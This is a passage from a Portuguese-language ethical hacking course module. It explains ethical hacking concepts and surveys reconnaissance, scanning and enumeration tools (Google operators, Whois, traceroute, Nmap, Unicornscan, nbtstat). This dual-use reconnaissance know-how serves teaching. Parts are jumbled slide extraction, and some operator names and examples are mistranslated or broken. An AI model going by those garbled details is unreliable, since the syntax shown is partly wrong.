pequena quantidade de espaço extra nos cabeçalhos TCP e IP do pacote de dados para ocultar
informações. Um invasor pode usar o sistema comprometido para lançar novos ataques contra outros
sistemas ou como um meio de atingir outro sistema na rede sem ser detectado. Assim, esta fase do
ataque pode se transformar na fase de reconhecimento de outro ataque. Os administradores de sistema
podem implantar IDS (sistemas de detecção de intrusão) baseados em host e software antivírus para
detectar cavalos de Tróia e outros arquivos e diretórios aparentemente comprometidos. Um profissional
de segurança deve estar ciente das ferramentas e técnicas que os invasores implantam para que possam
defender e implementar as contramedidas detalhadas nos módulos subsequentes.


Fluxo do módulo
3

Ético
Conceitos, Escopo e

Discutir conceitos, escopo e limitações de hacking ético

Um hacker ético segue processos semelhantes aos de um hacker mal-intencionado. As etapas para obter e
manter o acesso a um sistema de computador são semelhantes, independentemente das intenções do hacker.
Esta seção fornece uma visão geral do hacking ético, por que o hacking ético é necessário, o escopo e as
limitações do hacking ético e as habilidades de um hacker ético.


O que é Hacking
Ético ?
O hacking ético Ele se concentra em simular hackers éticos

envolve o uso de as técnicas usadas pelos realizar avaliações
ferramentas, truques e invasores para verificar a de segurança para
técnicas de hacking existência de uma organização com a
para identificar vulnerabilidades exploráveis permissão das
vulnerabilidades e garantir na segurança de um sistema autoridades envolvidas
a segurança do sistema
O que é Hacking Ético?
Hacking ético é a prática de empregar habilidades de computador e rede para ajudar as organizações a testar
a segurança de sua rede em busca de possíveis brechas e vulnerabilidades. White Hats (também conhecidos
como analistas de segurança ou hackers éticos) são os indivíduos ou especialistas que realizam hacking ético.
Atualmente, a maioria das organizações (como empresas privadas, universidades e organizações
governamentais) está contratando White Hats para ajudá-los a melhorar sua segurança cibernética. Eles
executam hackers de maneira ética, com a permissão da rede ou do proprietário do sistema e sem a intenção
de causar danos. Os hackers éticos relatam todas as vulnerabilidades ao proprietário do sistema e da rede
para correção, aumentando assim a segurança do sistema de informações de uma organização. O hacking
ético envolve o uso de ferramentas, truques e técnicas de hacking normalmente usadas por um invasor para
verificar a existência de vulnerabilidades exploráveis na segurança do sistema.
Hoje, o termo hacking está intimamente associado a atividades ilegais e antiéticas. Há um debate contínuo
sobre se o hacking pode ser ético ou não, dado o fato de que o acesso não autorizado a qualquer sistema é
crime. Considere as seguintes definições:
ÿ O substantivo “hacker” refere-se a uma pessoa que gosta de aprender os detalhes dos sistemas de
computador e ampliar suas capacidades.
ÿ O verbo “hackear” descreve o rápido desenvolvimento de novos programas ou a engenharia reversa de

software existente para torná-lo melhor ou mais eficiente de maneiras novas e inovadoras.
ÿ Os termos “cracker” e “atacante” referem-se a pessoas que empregam suas habilidades de hacker para
fins ofensivos.


ÿ O termo “hacker ético” refere-se aos profissionais de segurança que empregam seus
habilidades para fins defensivos.
A maioria das empresas emprega profissionais de TI para auditar seus sistemas em busca de vulnerabilidades conhecidas.
Embora essa seja uma prática benéfica, os crackers geralmente estão mais interessados em usar vulnerabilidades mais
recentes e menos conhecidas e, portanto, essas auditorias de sistema por números não são suficientes. Uma empresa
precisa de alguém que possa pensar como um cracker, acompanhar as mais novas vulnerabilidades e explorações e
reconhecer vulnerabilidades potenciais onde outros não conseguem. Esse é o papel do hacker ético.
Os hackers éticos geralmente empregam as mesmas ferramentas e técnicas que os hackers, com a importante exceção
de que não danificam o sistema. Eles avaliam a segurança do sistema, atualizam os administradores sobre quaisquer
vulnerabilidades descobertas e recomendam procedimentos para corrigir essas vulnerabilidades.
A distinção importante entre hackers éticos e crackers é o consentimento. Os crackers tentam obter acesso não autorizado
aos sistemas, enquanto os hackers éticos são sempre completamente abertos e transparentes sobre o que estão fazendo
e como estão fazendo. O hacking ético é, portanto, sempre legal.


Por que o hacking ético é necessário

Para derrotar um hacker, você precisa pensar como um!
O hacking ético é necessário, pois permite contra-ataques contra hackers mal-intencionados ,

antecipando os métodos usados para invadir o sistema
Razões pelas quais as organizações recrutam hackers éticos
Para impedir que hackers tenham acesso aos Fornecer medidas preventivas adequadas para
sistemas de informação da organização evitar violações de segurança
Para descobrir vulnerabilidades em sistemas e

Para ajudar a proteger os dados do cliente
explorar seu potencial como um risco de segurança
Analisar e fortalecer a postura de segurança de Aumentar a conscientização de segurança em

uma organização todos os níveis de uma empresa
Por que o hacking ético é necessário (continuação)

Hackers éticos tentam responder às seguintes perguntas
1 2 3
O que um intruso pode ver O que um intruso pode Alguém na organização-
no sistema de destino ? fazer com essa informação? alvo percebe as
(Obtendo acesso e tentativas ou sucessos
(fases de reconhecimento dos invasores?
e varredura) Fases de acesso de (Fases de Reconhecimento
manutenção) e Cobertura de Rastros )
4 5 6
Todos os componentes Quanto tempo, são as informações
da informação são esforço e dinheiro são medidas de segurança
sistema adequadamente necessários para obter em conformidade com os
protegido, atualizado e proteção adequada? padrões legais e da
corrigido? indústria?
Por que o hacking ético é necessário
Como a tecnologia está crescendo em um ritmo mais rápido, o mesmo acontece com o crescimento dos riscos associados
a ela. Para vencer um hacker é preciso pensar como um!
O hacking ético é necessário, pois permite combater ataques de hackers mal-intencionados, antecipando os métodos
usados por eles para invadir um sistema. O hacking ético ajuda a prever várias vulnerabilidades possíveis com bastante
antecedência e corrigi-las sem incorrer em qualquer tipo de


ataque externo. Como o hacking envolve pensamento criativo, testes de vulnerabilidade e auditorias de segurança por
si só não podem garantir que a rede seja segura. Para obter segurança, as organizações devem implementar uma
estratégia de “defesa em profundidade” penetrando em suas redes para estimar e expor vulnerabilidades.
Razões pelas quais as organizações recrutam hackers éticos
ÿ Para impedir que hackers tenham acesso aos sistemas de informação da organização
ÿ Para descobrir vulnerabilidades em sistemas e explorar seu potencial como um risco
ÿ Analisar e fortalecer a postura de segurança de uma organização, incluindo políticas, infraestrutura de

proteção de rede e práticas do usuário final
ÿ Providenciar medidas preventivas adequadas de forma a evitar quebras de segurança
ÿ Para ajudar a proteger os dados do cliente
ÿ Aumentar a conscientização de segurança em todos os níveis de uma empresa
A avaliação de um hacker ético sobre a segurança do sistema de informação de um cliente procura responder a três
perguntas básicas:
1. O que um invasor pode ver no sistema de destino?
As verificações normais de segurança pelos administradores do sistema geralmente ignoram as vulnerabilidades.

O hacker ético precisa pensar sobre o que um invasor pode ver durante as fases de reconhecimento e varredura
de um ataque.
2. O que um intruso pode fazer com essa informação?
O hacker ético deve discernir a intenção e o propósito por trás dos ataques para determinar as contramedidas
apropriadas. Durante as fases de obtenção e manutenção de acesso de um ataque, o hacker ético precisa estar
um passo à frente do hacker para fornecer proteção adequada.
3. As tentativas dos invasores estão sendo notadas nos sistemas de destino?
Às vezes, os invasores tentam violar um sistema por dias, semanas ou até meses. Outras vezes, eles obterão
acesso, mas aguardarão antes de fazer qualquer coisa prejudicial. Em vez disso, eles terão tempo para avaliar
o uso potencial das informações expostas. Durante as fases de reconhecimento e cobertura de rastros, o hacker
ético deve perceber e interromper o ataque.
Depois de realizar ataques, os hackers podem limpar seus rastros modificando arquivos de log e criando backdoors ou
implantando trojans. Os hackers éticos devem investigar se tais atividades foram registradas e quais medidas
preventivas foram tomadas. Isso não apenas fornece uma avaliação da proficiência do invasor, mas também uma visão
das medidas de segurança existentes do sistema que está sendo avaliado. Todo o processo de hacking ético e posterior
correção de vulnerabilidades descobertas depende de questões como:
ÿ O que a organização está tentando proteger?
ÿ Contra quem ou o que eles estão tentando protegê-lo?


ÿ Todos os componentes do sistema de informação estão adequadamente protegidos, atualizados e

remendado?
ÿ Quanto tempo, esforço e dinheiro o cliente está disposto a investir para obter
proteção?
ÿ As medidas de segurança da informação estão em conformidade com os padrões legais e da indústria?
Às vezes, para economizar recursos ou evitar novas descobertas, o cliente pode decidir encerrar a avaliação depois
que a primeira vulnerabilidade for encontrada; portanto, é importante que o hacker ético e o cliente elaborem previamente
uma estrutura adequada para investigação. O cliente deve ser convencido da importância desses exercícios de
segurança por meio de descrições concisas do que está acontecendo e do que está em jogo. O hacker ético também
deve se lembrar de transmitir ao cliente que nunca é possível proteger completamente os sistemas, mas que eles
sempre podem ser melhorados.


Escopo e Limitações do Hacking Ético
Escopo Limitações
ÿ O hacking ético é uma ÿ A menos que as empresas já saibam o que

componente das melhores práticas estão procurando e por que estão
de avaliação de risco, auditoria, contratando um fornecedor externo
combate à fraude e segurança de para hackear sistemas em primeiro
sistemas de informação lugar, é provável que não haja muito a
ganhar com a experiência
ÿ É usado para identificar riscos e
destacar ações corretivas. Também ÿ Um hacker ético só pode ajudar o
reduz os custos de TIC resolvendo organização para entender melhor seu
vulnerabilidades sistema de segurança; cabe à
organização colocar as proteções
corretas na rede
Escopo e Limitações do Hacking Ético
Os especialistas em segurança classificam amplamente os crimes de computador em duas categorias: crimes

facilitados por um computador e aqueles em que o computador é o alvo.
O hacking ético é uma avaliação de segurança estruturada e organizada, geralmente como parte de um teste de
penetração ou auditoria de segurança, e é um componente crucial da avaliação de risco, auditoria, contra-fraude e
melhores práticas de segurança de sistemas de informação. É usado para identificar riscos e destacar ações
corretivas. Também é usado para reduzir os custos de Tecnologia da Informação e Comunicação (TIC) resolvendo
vulnerabilidades.
Os hackers éticos determinam o escopo da avaliação de segurança de acordo com as preocupações de segurança
do cliente. Muitos hackers éticos são membros de uma “Equipe Tigre”. Uma equipe de tigres trabalha em conjunto
para realizar um teste em grande escala cobrindo todos os aspectos da rede, bem como a intrusão física e do
sistema.
Um hacker ético deve conhecer as penalidades da invasão não autorizada de um sistema. Nenhuma atividade de
hacking ético associada a um teste de penetração de rede ou auditoria de segurança deve começar antes de
receber um documento legal assinado dando ao hacker ético permissão expressa para realizar as atividades de
hacking da organização alvo. Os hackers éticos devem ser criteriosos com suas habilidades de hacking e
reconhecer as consequências do mau uso dessas habilidades.
O hacker ético deve seguir certas regras para cumprir suas obrigações éticas e morais. Eles devem fazer o seguinte:
ÿ Obter autorização do cliente e ter um contrato assinado dando ao testador

permissão para realizar o teste.
ÿ Manter a confidencialidade na realização do teste e seguir um Termo de Confidencialidade

Acordo (NDA) com o cliente para as informações confidenciais divulgadas durante o


teste. As informações coletadas podem conter informações confidenciais, e o hacker ético não deve divulgar
nenhuma informação sobre o teste ou dados confidenciais da empresa a terceiros.
ÿ Execute o teste até, mas não além dos limites acordados. Por exemplo, hackers éticos devem realizar ataques
DoS somente se tiverem previamente acordado isso com o cliente. Perda de receita, boa vontade e
consequências piores podem recair sobre uma organização cujos servidores ou aplicativos estão
indisponíveis para os clientes por causa do teste.
As etapas a seguir fornecem uma estrutura para realizar uma auditoria de segurança de uma organização, o que
ajudará a garantir que o teste seja organizado, eficiente e ético:
ÿ Conversar com o cliente e discutir as necessidades a serem atendidas durante o teste
ÿ Preparar e assinar documentos NDA com o cliente
ÿ Organizar uma equipe de hackers éticos e preparar o cronograma para testes
ÿ Realizar o teste
ÿ Analisar os resultados dos testes e preparar um relatório
ÿ Apresentar as conclusões do relatório ao cliente
No entanto, também existem limitações. A menos que as empresas saibam primeiro o que estão procurando e por
que estão contratando um fornecedor externo para hackear seus sistemas, é provável que não haja muito a ganhar
com a experiência. Um hacker ético, portanto, só pode ajudar a organização a entender melhor seu sistema de
segurança. Cabe à organização colocar as proteções corretas na rede.


Habilidades de um Hacker Ético
Habilidades técnicas Habilidades não técnicas
Conhecimento profundo dos principais A capacidade de aprender e adotar novas

ambientes operacionais , como tecnologias rapidamente
Windows, Unix, Linux e Macintosh
Forte ética de trabalho e boa resolução de
Conhecimento profundo de conceitos de rede, problemas e habilidades de comunicação
tecnologias e hardware e software relacionados
Comprometidos com as políticas de segurança da
organização
Um especialista em computador adepto de
Uma consciência dos padrões e leis locais
domínios técnicos
Conhecimento das áreas de segurança e

assuntos correlatos
Conhecimento “alto técnico” para

lançar ataques sofisticados
Habilidades de um Hacker Ético
É essencial para um hacker ético adquirir o conhecimento e as habilidades para se tornar um hacker especialista e usar
esse conhecimento de maneira legal. As habilidades técnicas e não técnicas para ser um bom hacker ético são discutidas
abaixo:
ÿ Competências Técnicas
o Conhecimento profundo dos principais ambientes operacionais, como Windows, Unix,

Linux e Macintosh
o Conhecimento profundo de conceitos de rede, tecnologias e hardware relacionado

e software
o Um especialista em informática adepto de domínios técnicos
o O conhecimento das áreas de segurança e assuntos relacionados
o Alto conhecimento técnico de como lançar ataques sofisticados
ÿ Competências Não Técnicas
o A capacidade de aprender e adaptar rapidamente novas tecnologias
o Uma forte ética de trabalho e boa resolução de problemas e habilidades de comunicação
o Compromisso com as políticas de segurança de uma organização
o Uma consciência dos padrões e leis locais


Fluxo do módulo
3

Ético
Conceitos, Escopo e

Ferramentas de hacking ético

Esta seção discute as várias ferramentas de hacking que permitem aos profissionais de segurança
coletar informações críticas sobre o alvo.


Reconhecimento Usando Avançado

Técnicas de hacking do Google
O hacking do Google refere-se ao uso de operadores avançados de
pesquisa do Google para criar consultas de pesquisa complexas para extrair
informações confidenciais ou ocultas que ajudam os invasores a encontrar alvos vulneráveis
Operadores populares de pesquisa avançada do Google
Operadores de pesquisa Descrição
[cache:] Exibe as páginas da web armazenadas no cache do Google
[ligação:] Lista as páginas da Web que possuem links para a página da Web especificada
[relacionado:] Lista páginas da web semelhantes à página da web especificada
[informações:] Apresenta algumas informações que o Google possui sobre uma determinada página da web
[local:] Restringe os resultados a esses sites no domínio determinado
[allintitle:] Restringe os resultados aos sites que contêm todas as palavras-chave de pesquisa no título
[título:] Restringe os resultados a documentos que contenham a palavra-chave de pesquisa no título
[allinurl:] Restringe os resultados àqueles que contêm todas as palavras-chave de pesquisa na URL
[url:] Restringe os resultados a documentos que contenham a palavra-chave de pesquisa na URL
[localização:] Localiza informações para um local específico
Reconhecimento usando técnicas avançadas de hacking do Google
O hacking do Google refere-se ao uso de operadores avançados de pesquisa do Google para criar consultas de
pesquisa complexas para extrair informações confidenciais ou ocultas. As informações acessadas são usadas
pelos invasores para encontrar alvos vulneráveis. A pegada usando técnicas avançadas de hacking do Google
envolve a localização de cadeias de texto específicas nos resultados de pesquisa usando operadores avançados
no mecanismo de pesquisa do Google.
O hacking avançado do Google refere-se à arte de criar consultas complexas em mecanismos de pesquisa. As
consultas podem recuperar dados valiosos sobre uma empresa-alvo dos resultados de pesquisa do Google. Por
meio do hacking do Google, um invasor tenta encontrar sites vulneráveis à exploração. Os invasores podem usar
o Google Hacking Database (GHDB), um banco de dados de consultas, para identificar dados confidenciais. Os
operadores do Google ajudam a encontrar o texto necessário e a evitar dados irrelevantes. Usando operadores
avançados do Google, os invasores podem localizar cadeias de texto específicas, como versões específicas de
aplicativos da Web vulneráveis. Quando uma consulta sem operadores de pesquisa avançada é especificada, o
Google rastreia os termos de pesquisa em qualquer parte da página da Web, incluindo título, texto, URL, arquivos
digitais e assim por diante. Para limitar uma pesquisa, o Google oferece operadores de pesquisa avançados.
Esses operadores de pesquisa ajudam a restringir a consulta de pesquisa e a obter a saída mais relevante e precisa.
A sintaxe para usar um operador de pesquisa avançada é a seguinte: operator: search_term
Observação: não insira nenhum espaço entre o operador e a consulta.
Alguns operadores populares de pesquisa avançada do Google
incluem: Fonte: http:// www.googleguide.com
ÿ site: Este operador restringe os resultados da pesquisa ao site ou domínio especificado.
Por exemplo, a consulta [games site: www.certifiedhacker.com] fornece informações sobre jogos do site
Certifiedhacker.


ÿ allinurl: Este operador restringe os resultados apenas às páginas que contêm todos os termos de consulta
especificados na URL.
Por exemplo, a consulta [allinurl: google carreira] retorna apenas as páginas que contêm as palavras “google” e
“carreira” no URL.
ÿ inurl: Este operador restringe os resultados apenas às páginas que contêm a palavra especificada
na URL.
Por exemplo, a consulta [inurl: copy site:www.google.com] retorna apenas as páginas do Google nas quais o URL
contém a palavra “copy”.
ÿ allintitle: Este operador restringe os resultados apenas às páginas que contêm todos os termos de consulta
especificados no título.
Por exemplo, a consulta [allintitle: detectar malware] retorna apenas páginas que contêm as palavras “detectar” e
“malware” no título.
ÿ intitle: Este operador restringe os resultados apenas às páginas que contêm o termo especificado em
o título.
Por exemplo, a consulta [detecção de malware intitle:help] retorna apenas páginas que têm o termo "ajuda" no título
e os termos "malware" e "detecção" em qualquer lugar da página.
ÿ inanchor: Este operador restringe os resultados apenas às páginas que contêm os termos da consulta
especificado no texto âncora nos links para a página.
Por exemplo, a consulta [Anti-virus inanchor:Norton] retorna apenas páginas com texto âncora em links para as
páginas que contêm a palavra “Norton” e a página que contém a palavra “Antivírus”.
ÿ allinanchor: Este operador restringe os resultados apenas às páginas que contêm todos os termos da consulta
especificado no texto âncora nos links para as páginas.
Por exemplo, a consulta [allinanchor: melhor provedor de serviços de nuvem] retorna apenas páginas para as quais
o texto âncora nos links para as páginas contém as palavras “melhor”, “nuvem”, “serviço” e “provedor”.
ÿ cache: Este operador exibe a versão em cache do Google de uma página da web em vez do
versão atual da página da web.
Por exemplo, [cache:www.eff.org] mostrará a versão em cache do Google da página inicial da Electronic Frontier
Foundation.
ÿ link: Este operador pesquisa sites ou páginas que contêm links para o site especificado
ou página.
Por exemplo, [link:www.googleguide.com] encontra páginas que apontam para a página inicial do Guia do Google.
Observação: de acordo com a documentação do Google, “você não pode combinar um link: pesquisa com uma
pesquisa de palavra-chave comum”.


Observe também que quando você combina link: com outro operador avançado, o Google pode não retornar
todas as páginas correspondentes.
ÿ relacionado: este operador exibe sites semelhantes ou relacionados ao URL especificado.
Por exemplo, [relacionado:www.microsoft.com] fornece a página de resultados do mecanismo de pesquisa

do Google com sites semelhantes a microsoft.com.
ÿ info: Este operador encontra informações para a página da web especificada.
Por exemplo, [info:gothotel.com] fornece informações sobre a página inicial do diretório nacional de hotéis
GotHotel.com.
ÿ localização: Este operador encontra informações para um local específico.
Por exemplo, [location: 4 seasons restaurant] fornecerá resultados com base no termo “4 seasons restaurant”.
ÿ Tipo de arquivo: Este operador permite pesquisar resultados com base em uma extensão de arquivo.
Por exemplo, [jasmine:jpg] fornecerá arquivos jpg baseados em jasmine.


Ferramentas de Reconhecimento
dados da web
Ele extrai dados de contato direcionados (e-mail,
extrator telefone e fax) do site, extrai o URL e as meta tags (título,
descrição, palavra-chave) para promoção do site e assim por diante
http:// www.webextractor.com https:// whois.domaintools.com
Ferramentas de reconhecimento (continuação)
IMCP Traceroute Traceroute TCP
Traceroute UDP
Ferramentas de Reconhecimento
As ferramentas de reconhecimento são usadas para coletar informações básicas sobre os sistemas de destino para
explorá-los. As informações coletadas pelas ferramentas de footprinting incluem as informações de localização IP do
alvo, informações de roteamento, informações comerciais, endereço, número de telefone e número de CPF, detalhes
sobre a origem de um e-mail e um arquivo, informações de DNS, informações de domínio e assim por diante.


ÿ Extrator de Dados Web
Fonte: http:// www.webextractor.com
Web Data Extractor extrai automaticamente informações específicas de páginas da web. Ele extrai dados
de contato direcionados (e-mail, telefone e fax) do site, extrai a URL e as meta tags (título, descrição,
palavra-chave) para promoção do site, pesquisa a criação de diretórios, realiza pesquisas na web e assim
por diante.
Conforme mostrado na captura de tela, os invasores usam o Web Data Extractor para coletar
automaticamente informações críticas, como listas de metatags, endereços de e-mail e números de telefone
e fax do site de destino.
Figura 2.3: captura de tela do extrator de dados da Web
ÿ Pesquisa Whois
Serviços Whois como https:// whois.domaintools.com ou https:// www.tamos.com podem ajudar a realizar
pesquisas Whois. A captura de tela mostra a análise do resultado de uma pesquisa Whois obtida com os
dois serviços Whois mencionados acima. Os serviços executam a pesquisa Whois inserindo o domínio ou
endereço IP do alvo. O serviço domaintools.com fornece informações Whois, como informações do
registrante, e-mail, informações de contato administrativo, data de criação e expiração e uma lista de
servidores de domínio. SmartWhois, disponível em http:// www.tamos.com, fornece informações sobre um
endereço IP, nome de host ou domínio, incluindo informações sobre o país, estado ou província, cidade,
telefone


número, número de fax, nome do provedor de rede, administrador e informações de contato do

suporte técnico. Também ajuda a encontrar o proprietário do domínio, as informações de contato
do proprietário, o proprietário do bloco de endereços IP, a data de registro do domínio e assim
por diante. Ele oferece suporte a nomes de domínio internacionalizados (IDNs), o que significa
que é possível consultar nomes de domínio que usam caracteres não ingleses. Também suporta
endereços IPv6.
Figura 2.4: captura de tela do WhoIs


Figura 2.5: captura de tela do SmartWhois
ÿ Traceroute ICMP
O sistema operacional Windows, por padrão, usa traceroute ICMP. Vá para o prompt de comando e digite o
comando tracert junto com o endereço IP de destino ou nome de domínio da seguinte forma:
Figura 2.6: Captura de tela mostrando a saída do ICMP Traceroute


ÿ Traceroute TCP
Muitos dispositivos em qualquer rede geralmente são configurados para bloquear mensagens traceroute ICMP.
Nesse cenário, um invasor usa traceroute TCP ou UDP, também conhecido como traceroute de Camada 4. Vá para
o terminal no sistema operacional Linux e digite o comando tcptraceroute junto com o endereço IP de destino ou
nome de domínio da seguinte forma:
tcptraceroute www.google.com
Figura 2.7: Captura de tela mostrando a saída do TCP Traceroute
ÿ UDP Traceroute
Como o Windows, o Linux também possui um utilitário traceroute embutido, mas usa o protocolo UDP para rastrear
a rota até o destino. Vá para o terminal no sistema operacional Linux e digite o comando traceroute junto com o
endereço IP de destino ou nome de domínio da seguinte forma:
traceroutewww.google.com
Figura 2.8: Captura de tela mostrando a saída do UDP Traceroute


Ferramentas de digitalização
Megaping
Inclui scanners como Scanner de segurança abrangente, scanner de porta

Nmap (portas TCP e UDP), scanner IP, scanner NetBIOS e
Compartilhar Scanner
Use o Nmap para extrair informações como hosts ativos
na rede, portas abertas, serviços (nome e versão do
aplicativo), tipos de filtros de pacotes/firewalls, bem como
sistemas operacionais e versões usadas
https:// nmap.org http:// www.magnetosoft.com
Ferramentas de digitalização (continuação)
Unicornscan
No Unicornscan, o sistema operacional da máquina de destino pode ser Hping2/Hping3
http:// www.hping.org
identificado observando os valores TTL no resultado da verificação adquirida
NetScanTools Pro
https:// www.netscantools.com
SolarWinds Port Scanner https://

www.solarwinds.com
PRTG Network Monitor https://

www.paessler.com
Possível sistema operacional é o Windows Analisador de protocolo de rede OmniPeek

https:// www.liveaction.com
https:// sourceforge.net
Ferramentas de digitalização
ÿ Nmap
Fonte: https:// nmap.org
Nmap ("Network Mapper") é um scanner de segurança para exploração de rede e hacking. Ele
permite descobrir hosts, portas e serviços em uma rede de computadores, criando assim um
"mapa" da rede. Ele envia pacotes especialmente criados para o host de destino e, em seguida,


analisa as respostas para atingir seu objetivo. Ele verifica vastas redes de literalmente centenas de milhares
de máquinas. O Nmap inclui muitos mecanismos para varredura de portas (TCP e UDP), detecção de SO,
detecção de versão, varreduras de ping e assim por diante.
Um profissional de segurança ou um invasor pode usar essa ferramenta para suas necessidades específicas.
Os profissionais de segurança podem usar o Nmap para inventário de rede, gerenciamento de agendamentos
de atualização de serviço e monitoramento de host ou tempo de atividade do serviço. Os invasores usam o
Nmap para extrair informações como hosts ativos na rede, portas abertas, serviços (nome e versão do
aplicativo), tipo de filtros/firewalls de pacotes, detalhes do MAC e sistemas operacionais junto com suas
versões.
Sintaxe: # nmap <opções> <Endereço IP de destino>
Figura 2.9: Captura de tela exibindo a varredura do Nmap
ÿ MegaPing
Fonte: http:// www.magnetosoft.com
MegaPing inclui scanners como Scanner de segurança abrangente, scanner de porta (portas TCP e UDP),
scanner de IP, scanner NetBIOS e Scanner de compartilhamento. Todos os Scanners podem verificar
computadores individuais, qualquer intervalo de endereços IP, domínios e tipos selecionados de computadores
dentro de domínios. O scanner de segurança MegaPing fornece as seguintes informações: nomes NetBIOS,
informações de configuração, portas TCP e UDP abertas, transportes, compartilhamentos, usuários, grupos,
serviços, drivers, unidades locais, sessões e hora remota, impressoras.


Figura 2.10: Captura de tela exibindo a varredura do MegaPing
ÿ Unicornscan
Fonte: https:// sourceforge.net
No Unicornscan, o sistema operacional da máquina de destino pode ser identificado observando os valores
TTL no resultado da varredura adquirida. Para executar o Unicornscan, a sintaxe #unicornscan <endereço
IP de destino> é usada. Conforme mostrado na captura de tela, o valor ttl adquirido após a varredura é 128;
portanto, o sistema operacional é possivelmente o Microsoft Windows (Windows 7/8/8.1/10 ou Windows Server
2008/12/16).


Figura 2.11: Descoberta do sistema operacional usando o Unicornscan
Algumas ferramentas de verificação adicionais estão listadas abaixo:
ÿ Hping2/Hping3 (http:// www.hping.org)

ÿ NetScanTools Pro (https:// www.netscantools.com)
ÿ SolarWinds Port Scanner (https:// www.solarwinds.com)
ÿ PRTG Network Monitor (https:// www.paessler.com)
ÿ OmniPeek Network Protocol Analyzer (https:// www.liveaction.com)


Ferramentas de Enumeração
NetBIOS Enumerator ajuda a enumerar detalhes, Outro NetBIOS

NetBIOS como nomes NetBIOS, nomes de usuário, Ferramentas de Enumeração:
Enumerador Nomes de domínio e endereços MAC para um
determinado intervalo de endereços IP
O utilitário nbtstat no Windows exibe Inventário de rede
Estatísticas do protocolo NetBIOS sobre
nbtstat global http://
TCP/IP (NetBT) , tabelas de nomes NetBIOS www.magnetosoft.com
Utilitário para computadores locais e remotos e o cache
de nomes NetBIOS
Os invasores especificam um intervalo
de IP para enumerar as informações do NetBIOS Scanner IP
Avançado
https://
www.advanced ip-scanner.com
Hiena
https:// www.systemtools.com
Obtenha informações, como
nomes NetBIOS, nomes de
usuário, nomes de domínio
e endereços MAC
Nsauditor Network
Security Auditor https://
www.nsauditor.com
http:// nbtenum.sourceforge.net
Ferramentas de Enumeração
ÿ Utilitário Nbtstat
Fonte: https:// docs.microsoft.com
Nbtstat é um utilitário do Windows que ajuda na solução de problemas de resolução de nomes NETBIOS. O
comando nbtstat remove e corrige entradas pré-carregadas usando várias opções que diferenciam maiúsculas
de minúsculas. Os invasores usam Nbtstat para enumerar informações como estatísticas de protocolo NetBIOS
sobre TCP/IP (NetBT), tabelas de nomes NetBIOS para computadores locais e remotos e o cache de nomes
NetBIOS.
A sintaxe do comando nbtstat é a seguinte:

nbtstat [-a NomeRemoto] [-A Endereço IP] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Intervalo]
A tabela mostrada abaixo lista vários parâmetros Nbtstat e suas respectivas funções.
nbtstat
Função
Parâmetro
Exibe a tabela de nomes NetBIOS de um computador remoto, em que RemoteName é

-a NomeRemoto
o nome NetBIOS do computador remoto
Exibe a tabela de nomes NetBIOS de um computador remoto, especificada pelo
-Um endereço IP
endereço IP (em notação decimal com ponto) do computador remoto
Lista o conteúdo do cache de nomes NetBIOS, a tabela de nomes NetBIOS e seus
-c
endereços IP resolvidos
Exibe os nomes registrados localmente pelos aplicativos NetBIOS, como o servidor e o

-n
redirecionador


-r Exibe uma contagem de todos os nomes resolvidos por uma transmissão ou servidor WINS
-R Limpa o cache de nomes e recarrega todas as entradas marcadas com #PRE do arquivo Lmhosts
-RR Libera e registra novamente todos os nomes com o servidor de nomes
Lista a tabela de sessões NetBIOS convertendo endereços IP de destino em computador

-s
Nomes NetBIOS
-S Lista as sessões NetBIOS atuais e seus status com os endereços IP
Exibe novamente as estatísticas selecionadas, pausando em cada exibição pelo número de segundos
Intervalo
especificado em Intervalo
Tabela 2.1: Parâmetros Nbtstat e suas respectivas funções
A seguir estão alguns exemplos de comandos nbtstat.
o O comando nbtstat “nbtstat –a <endereço IP da máquina remota>” pode ser executado para obter a
tabela de nomes NetBIOS de uma máquina remota
computador.
Figura 2.12: Comando Nbtstat para obter a tabela de nomes de um sistema remoto
o O comando nbtstat “nbtstat –c” pode ser executado para obter o conteúdo do
Cache de nomes NetBIOS, a tabela de nomes NetBIOS e seus endereços IP resolvidos.
Figura 2.13: Comando Nbtstat para obter o conteúdo da tabela de nomes NetBIOS


ÿ Enumerador NetBIOS
Fonte: http:// nbtenum.sourceforge.net
NetBIOS Enumerator é uma ferramenta de enumeração que mostra como usar a rede remota
suporte e para lidar com alguns outros protocolos da web, como SMB. Conforme mostrado na captura de tela,
os invasores usam o NetBIOS Enumerator para enumerar detalhes como nomes NetBIOS, nomes de usuário,
nomes de domínio e endereços de controle de acesso à mídia (MAC) para um determinado intervalo de
endereços IP.
Figura 2.14: captura de tela do enumerador NetBIOS
A seguir estão algumas ferramentas de enumeração NetBIOS adicionais:
ÿ Inventário de rede global (http:// www.magnetosoft.com)
ÿ Advanced IP Scanner (https:// www.advanced-ip-scanner.com)
ÿ Hiena (https:// www.systemtools.com)
ÿ Nsauditor Network Security Auditor (https:// www.nsauditor.com)


Resumo do Módulo
Ele discutiu conceitos de hacking

Este módulo discutiu a metodologia da
ético, como seu escopo e limitações
1 cadeia de destruição cibernética, 4 e as habilidades de um hacker ético
TTPs e IoCs em detalhes
Finalmente, este módulo terminou com

Ele também discutiu conceitos
2 de hacking e aulas de hackers
5 uma visão geral das ferramentas de
hacking ético
No próximo módulo, discutiremos

Este módulo também discutiu em
em detalhes sobre ameaças de
3 detalhes as diferentes fases do ciclo 6 segurança da informação,
de hacking
vulnerabilidades e conceitos de malware
Resumo do Módulo
Este módulo discutiu detalhadamente a metodologia de cyber kill chain, TTPs e IoCs. Ele também discutiu
conceitos de hacking e aulas de hackers. Além disso, também discutiu em detalhes as diferentes fases de
um ciclo de hacking. Além disso, discutiu conceitos de hacking ético, como seu escopo e limitações e as
habilidades de um hacker ético. Finalmente, o módulo terminou com uma visão geral das ferramentas de
hacking ético.
No próximo módulo, discutiremos em detalhes ameaças de segurança da informação, vulnerabilidades e

conceitos de malware.

MT
CE-Conselho
EC-Council
E
Ethical
HE
Hacking Essentials
Módulo 03
A me a ça s à S e g u r an ç a da I n f o r m aç ã o e A v a l i a ç ã o
d e V u l ne r ab i l i d a d e

Ameaças de segurança da informação e avaliação de vulnerabilidade
1 Compreendendo a ameaça e as fontes de ameaça
2 Noções básicas sobre malware e componentes de malware
3 Visão geral das técnicas comuns que os invasores usam para distribuir malware na Web
4 Visão geral de diferentes tipos de malware e contramedidas de malware
5 Noções básicas sobre vulnerabilidade e classificação de vulnerabilidade
6 Noções básicas sobre avaliação de vulnerabilidade e tipos de avaliação de vulnerabilidade
7 Visão geral dos sistemas de pontuação de vulnerabilidade e do ciclo de vida do gerenciamento de vulnerabilidade
